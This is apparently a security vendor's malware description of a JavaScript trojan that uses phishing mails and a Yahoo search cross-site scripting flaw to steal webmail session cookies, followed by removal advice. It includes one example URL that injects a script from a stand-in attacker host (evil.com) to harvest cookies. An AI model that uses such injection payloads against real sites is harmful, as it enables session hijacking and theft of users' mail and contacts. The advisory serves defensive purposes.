Trojan.JS.CookieMonster.A

SYMPTOMS:

The user receives a mail on yahoo with the subject line containing "shell" or "c99" (for example "wtf is c99shell" , "a shell written in php??" or "look what I found, shell") and the body containing for example: "check this c99 russian php shell script"
Another case is when mail seems to be from hi5.com with a legitimate subject like "some_name_here has sent you a hi5 Friend Request", where the user is prompted to click a link to accept his new friend, link which is not pointing to hi5.com.

TECHNICAL DESCRIPTION:

If the user clicks that link from webmail he will be redirected to a page which is exploited using a "cross site scripting" or a "html injection" vulnerability that had the effect of executing the contained javascript in the security context of Yahoo, javascript which steal the user cookies used for yahoo mail.
The vulnerability affects the yahoo search engine so that browsers visiting the malicious page try to open:
http://search.yahoo.com/bin/search?p=[...http://evil.com/script.js...]
The script.js is executed and this script calls document.cookie to get user cookies and to save them.
Those cookies help that spammer to hijack that yahoo session and get into user mail account where he can harvest the contacts from user address book and make more spam or he can read user mails even the user has signed out.

Removal instructions:

Delete those mails described in "Symptoms" and change your password immediately!

ANALYZED BY:

Sorin Ciorceri, virus researcher